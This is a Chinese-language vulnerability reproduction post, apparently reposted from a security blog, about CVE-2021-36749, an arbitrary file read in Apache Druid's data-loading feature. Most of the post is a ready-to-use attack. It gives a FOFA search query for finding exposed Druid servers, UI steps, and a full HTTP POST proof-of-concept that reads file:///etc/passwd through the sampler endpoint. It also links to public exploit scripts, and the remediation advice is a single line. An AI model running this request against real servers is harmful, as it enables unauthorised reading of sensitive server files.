【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞
阿新 • • 發佈:2021-11-18
0x00 漏洞詳情
由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP
InputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺服器敏感性資訊洩露。
0x01 fofa語法
title="Apache Druid"
0x02 漏洞復現
主介面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://協議進行讀取)
file:///etc/passwd
POC:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 Host: 127.0.0.1:8888 Content-Length: 413 Accept: application/json, text/plain, */* Origin: http://127.0.0.1:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/json;charset=UTF-8 Referer: http://127.0.0.1:8888/unified-console.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
0x03 利用指令碼
- https://github.com/BrucessKING/CVE-2021-36749/blob/main/CVE-2021-36749.py
- https://github.com/dorkerdevil/CVE-2021-36749/blob/main/CVE-2021-36749.py
0x04 修復方法
升級版本,設定訪問許可權
轉載請註明:Adminxe's Blog»【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞